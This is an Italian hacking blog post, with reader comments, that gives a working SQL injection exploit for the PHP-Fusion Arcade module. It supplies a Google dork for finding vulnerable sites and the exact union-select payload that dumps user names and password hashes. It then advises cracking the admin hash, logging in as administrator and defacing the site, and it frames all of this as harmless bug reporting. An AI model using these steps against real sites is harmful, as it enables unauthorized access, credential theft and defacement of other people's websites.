Exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection Vulnerability

Un altro exploit by Xoron, il bug affligge PHP-Fusion precisamente il modulo Arcade, è una remote SQL Injection.

Inanzitutto possiamo aiutare qualche webmaster sprovveduto che non ha ancora aggiornato il suo portale,

possiamo trovare siti vulnerabili con una GOOGLE DORK, facciamo una ricerca su google scrivendo: /infusions/arcade/, non appena troviamo un sito vulnerabile possiamo avvisare l’amministratore del bug.

Il bug è nell’ index.php, basta aggiungere all’indirizzo http://indirizzovittima.com/infusions/arcade/

la stringa:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/

null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

Aggiorniamo la pagina, se l’exploit ha funzionato il modulo Arcade ci mostrerà gli User e le password criptate in Hash MD5, copiamo i dati dell’admin, e diamo in pasto l’hash a passcracking.ru.

Non appena il cracker ci restituisce la password in chiaro, possiamo effettuare l’accesso al portale con l’account dell’Admin, possiamo defacciare il sito con un redirect ad un nostro indirizzo con una nostra grafica personalizzata che indica il bug e i possibili rimedi, mi raccomando niente danni!😉

Un vero hacker si limita soltando a segnalare i bug e a dare spiegazioni su come risolverli, non distrugge nulla!

Adesso vi saluto! Alla prossima! Ciau🙂

8 Responses to “Exploit PHP-FUSION Arcade Module (cid) Remote SQL Injection Vulnerability”


  1. 1 Elecmon 17, luglio, 2007 alle 12:46 pm

    Veramente ingegnioso!

  2. 2 phoenix 18, luglio, 2007 alle 4:20 pm

    un vero hacker si decodifica l’hash da solo (semmai con John The Ripper)😉

    Cmq hai detto parole giustissime riguardo al non creare danni e fare ca**ate su siti altrui… basta avvisare l’admin e così hai la coscienza a posto.

  3. 3 underground0 18, luglio, 2007 alle 4:44 pm

    mmm… si puoi utilizzare John The Ripper, ma perchè non utilizzare un servio pubblico come milw0rm e simili facendo aumentare le password memorizzate nel database, così da rendere più veloce un successivo cracking… invece di utilizzare John The Ripper perdendo tempo… rifacendomi all’etica hacker “la libertà di informazione alla portata di tutti”, non è meglio condividere invece che tenersi i lavori per se…

  4. 4 ]Do[Mi]nO[ 19, agosto, 2007 alle 7:50 pm

    a me sta cosa non funziona mai… sapete il motivo xcaso ?

  5. 5 daniele 27, agosto, 2007 alle 11:49 am

    ma come faccio a trovare siti vulnerabili?

  6. 6 underground0 22, settembre, 2007 alle 10:24 pm

    @]Do[Mi]nO[

    Se non funziona vuol dire che il portale è stato patchato!

    @daniele

    è scritto nell’articolo! Mi chiedo ma li leggete prima di fare domande!? ?_?

  7. 7 vito 8, aprile, 2008 alle 10:14 pm

    mi da dappertutto questo errore:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1

  8. 8 vito 25, maggio, 2008 alle 1:45 am

    …. a me non funzia ….


Comments are currently closed.



Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,049,926 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

luglio: 2007
L M M G V S D
« Giu   Set »
 1
2345678
9101112131415
16171819202122
23242526272829
3031